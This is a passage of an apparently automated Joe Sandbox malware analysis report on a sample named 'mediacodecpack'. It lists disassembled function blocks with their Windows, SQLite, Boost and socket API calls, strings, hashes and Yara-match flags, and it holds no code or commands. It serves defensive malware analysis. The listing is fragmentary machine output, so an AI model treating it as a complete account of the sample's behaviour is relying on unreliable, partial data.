                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_exec
                                                                                • String ID: sqlite_master$sqlite_temp_master$|
                                                                                • API String ID: 2141490097-2247242311
                                                                                • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 02D1098F
                                                                                  • Part of subcall function 02D114E3: std::exception::_Copy_str.LIBCMT ref: 02D114FC
                                                                                  • Part of subcall function 02D0FD60: __CxxThrowException@8.LIBCMT ref: 02D0FDBE
                                                                                • std::exception::exception.LIBCMT ref: 02D109EE
                                                                                Strings
                                                                                • boost unique_lock has no mutex, xrefs: 02D1097E
                                                                                • $, xrefs: 02D109F3
                                                                                • boost unique_lock owns already the mutex, xrefs: 02D109DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                • API String ID: 2140441600-46888669
                                                                                • Opcode ID: 7772e693ebe86826e9cfd3a8599c344e11ebf6076a7f21fce565ffa004cecf11
                                                                                • Instruction ID: cc6774be081ca666721f40f9f3fa885f910494d609748d609f4cf6fdf1e3c57c
                                                                                • Opcode Fuzzy Hash: 7772e693ebe86826e9cfd3a8599c344e11ebf6076a7f21fce565ffa004cecf11
                                                                                • Instruction Fuzzy Hash: 622125B19083909FD320EF24D15475BBBE9BB88B08F10491DF4A587780D7B9D848CFA2
                                                                                APIs
                                                                                • __getptd_noexit.LIBCMT ref: 02D136F0
                                                                                  • Part of subcall function 02D148E2: GetLastError.KERNEL32(774D0A60,774CF550,02D14AD0,02D12043,774CF550,?,02D05A0D,00000104,774D0A60,774CF550,ntdll.dll,?,?,?,02D05EE8), ref: 02D148E4
                                                                                  • Part of subcall function 02D148E2: __calloc_crt.LIBCMT ref: 02D14905
                                                                                  • Part of subcall function 02D148E2: __initptd.LIBCMT ref: 02D14927
                                                                                  • Part of subcall function 02D148E2: GetCurrentThreadId.KERNEL32 ref: 02D1492E
                                                                                  • Part of subcall function 02D148E2: SetLastError.KERNEL32(00000000,02D05A0D,00000104,774D0A60,774CF550,ntdll.dll,?,?,?,02D05EE8), ref: 02D14946
                                                                                • __calloc_crt.LIBCMT ref: 02D13713
                                                                                • __get_sys_err_msg.LIBCMT ref: 02D13731
                                                                                • __invoke_watson.LIBCMT ref: 02D1374E
                                                                                Strings
                                                                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D136FB, 02D13721
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                • API String ID: 109275364-798102604
                                                                                • Opcode ID: 5ecf89e8dd1c07f7ba0a680bfdb4c52965f56bc1d3e26f8400fc5ebcec771111
                                                                                • Instruction ID: 8e8fe6ccbcc77532366b035399e46863393e0ec85f2966f5c7c89f83f49f36dc
                                                                                • Opcode Fuzzy Hash: 5ecf89e8dd1c07f7ba0a680bfdb4c52965f56bc1d3e26f8400fc5ebcec771111
                                                                                • Instruction Fuzzy Hash: 49F0E2B6A447547BA7613A6ABC80A3B72CDDF457F4F0000A6FA8496F00FB25EC00C6E5
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D02350
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D02360
                                                                                • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D02370
                                                                                • GetLastError.KERNEL32 ref: 02D0237A
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID: pqcs
                                                                                • API String ID: 1619523792-2559862021
                                                                                • Opcode ID: d4d8a0ee084f68a354d23ce041bb76d828feb93bcdf75d8bcc31fb6b62f8e519
                                                                                • Instruction ID: c24bd8b55ad83f568720036e4857306aed30628cc4ec74e554a1351f5f5d0de4
                                                                                • Opcode Fuzzy Hash: d4d8a0ee084f68a354d23ce041bb76d828feb93bcdf75d8bcc31fb6b62f8e519
                                                                                • Instruction Fuzzy Hash: 41F09070A40304AFDB30AF64AD4CFAB77ACEB11301F500569E945C2390EBB0DD18CB90
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D04035
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D04042
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D04049
                                                                                • std::exception::exception.LIBCMT ref: 02D04063
                                                                                  • Part of subcall function 02D096CE: __EH_prolog.LIBCMT ref: 02D096D3
                                                                                  • Part of subcall function 02D096CE: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D096E2
                                                                                  • Part of subcall function 02D096CE: __CxxThrowException@8.LIBCMT ref: 02D09701
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 3112922283-2104205924
                                                                                • Opcode ID: 838cbeb272611997ebc95b273b5d289930ad3f1257eb1f42bb5fd503bb0c6483
                                                                                • Instruction ID: c60e00b47d8d4f6c9642650881578d614437902881b79b77051f2287489921a1
                                                                                • Opcode Fuzzy Hash: 838cbeb272611997ebc95b273b5d289930ad3f1257eb1f42bb5fd503bb0c6483
                                                                                • Instruction Fuzzy Hash: 28F05E71E00219ABDB10AFE0DA48BEE7778EF14305F504844E916A2381DB39891D8B91
                                                                                APIs
                                                                                  • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                  • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                  • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                  • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                  • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                • String ID:
                                                                                • API String ID: 683514883-0
                                                                                • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                APIs
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                  • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                  • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                  • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                • String ID:
                                                                                • API String ID: 1903298374-0
                                                                                • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                APIs
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 0040389D
                                                                                • GetFileType.KERNEL32(00000800), ref: 00403943
                                                                                • GetStdHandle.KERNEL32(-000000F6), ref: 0040399C
                                                                                • GetFileType.KERNEL32(00000000), ref: 004039AA
                                                                                • SetHandleCount.KERNEL32 ref: 004039E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleType$CountInfoStartup
                                                                                • String ID:
                                                                                • API String ID: 1710529072-0
                                                                                • Opcode ID: f9f6c698642d398b554f84be3c90f4064283888af6bbc673017cb63da6670b61
                                                                                • Instruction ID: 825ec877f99b7629084fcbf2355a8090dcaf6ef966e66130ad5ff06318bbd0a8
                                                                                • Opcode Fuzzy Hash: f9f6c698642d398b554f84be3c90f4064283888af6bbc673017cb63da6670b61
                                                                                • Instruction Fuzzy Hash: 125125B15046018FD7208F29C988B667F98BB02736F15873AE492FB3E1D7BC9A05C709
                                                                                APIs
                                                                                  • Part of subcall function 02D10A60: CloseHandle.KERNEL32(00000000,5304F1C2), ref: 02D10AB1
                                                                                  • Part of subcall function 02D10A60: WaitForSingleObject.KERNEL32(?,000000FF,5304F1C2,?,?,?,?,5304F1C2,02D10A33,5304F1C2), ref: 02D10AC8
                                                                                • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D10D2E
                                                                                • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D10D4E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D10D87
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D10DDB
                                                                                • SetEvent.KERNEL32(?), ref: 02D10DE2
                                                                                  • Part of subcall function 02D0418C: CloseHandle.KERNEL32(00000000,?,02D10D15), ref: 02D041B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 4166353394-0
                                                                                • Opcode ID: 1e785c63aff41626f9e9c086f76f8a86883e3726709c881efc5f7b7a291b205d
                                                                                • Instruction ID: 90b83161e7b241feb82f32a5d498979bb7d714ca4b2da30d30fe1fe1ac99953d
                                                                                • Opcode Fuzzy Hash: 1e785c63aff41626f9e9c086f76f8a86883e3726709c881efc5f7b7a291b205d
                                                                                • Instruction Fuzzy Hash: C5410331640301AFDB25AF28EC80B1B77A4EF45725F140668EC18EBB95C73AEC41CBA1
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D020AC
                                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D020CD
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D020D8
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 02D0213E
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D021A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                • String ID:
                                                                                • API String ID: 1611172436-0
                                                                                • Opcode ID: 7bcc52af48c632d28414d44bd7ab2e4ddba06026355ddab30d07b3bd368e15b0
                                                                                • Instruction ID: b2a675401b5c53316086fda83df65309683b39bb088da54465bc8235bf3893ea
                                                                                • Opcode Fuzzy Hash: 7bcc52af48c632d28414d44bd7ab2e4ddba06026355ddab30d07b3bd368e15b0
                                                                                • Instruction Fuzzy Hash: DD3139715047019FC325DF25D888B6BB7F9FBD8754F104A1EA896827A0D730E909CBA2
                                                                                APIs
                                                                                  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                • String ID:
                                                                                • API String ID: 1894464702-0
                                                                                • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0D101
                                                                                  • Part of subcall function 02D01A01: TlsGetValue.KERNEL32 ref: 02D01A0A
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D0D180
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D0D19C
                                                                                • InterlockedIncrement.KERNEL32(02D330F0), ref: 02D0D1C1
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D0D1D6
                                                                                  • Part of subcall function 02D027F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D0284E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                • String ID:
                                                                                • API String ID: 1578506061-0
                                                                                • Opcode ID: 57062f808f059be5a2b708c892473dce8ced86911afd5d6d0f83d5017aac356d
                                                                                • Instruction ID: 966545024f8ea6b118800340b36fa19114552b21151ef0b2dd92f3178d982c65
                                                                                • Opcode Fuzzy Hash: 57062f808f059be5a2b708c892473dce8ced86911afd5d6d0f83d5017aac356d
                                                                                • Instruction Fuzzy Hash: F93113B1D052059FC760DFA8D984BAABBF9FB18310F10455AD849A7780E734AA14CFA1
                                                                                APIs
                                                                                  • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                • sqlite3_log.SQLITE3 ref: 60925406
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                • String ID:
                                                                                • API String ID: 3336957480-0
                                                                                • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                APIs
                                                                                • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                • String ID:
                                                                                • API String ID: 3091402450-0
                                                                                • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02A3B
                                                                                • closesocket.WS2_32 ref: 02D02A42
                                                                                • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D02A89
                                                                                • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D02A97
                                                                                • closesocket.WS2_32 ref: 02D02A9E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                • String ID:
                                                                                • API String ID: 1561005644-0
                                                                                • Opcode ID: f08cebc4acdc6c34f046f7ac6f135cd8f415682a62854ee4bbda927eb6970b0e
                                                                                • Instruction ID: 072da88e9c140877765189511b18c6558e2f01c6a9552e43b7922cb712b3d96c
                                                                                • Opcode Fuzzy Hash: f08cebc4acdc6c34f046f7ac6f135cd8f415682a62854ee4bbda927eb6970b0e
                                                                                • Instruction Fuzzy Hash: C621FE71A05205AFEB20ABB9988CB6E77A9DF44319F114969E814C33E1EF708D40CB60
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                • String ID:
                                                                                • API String ID: 251237202-0
                                                                                • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                APIs
                                                                                • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
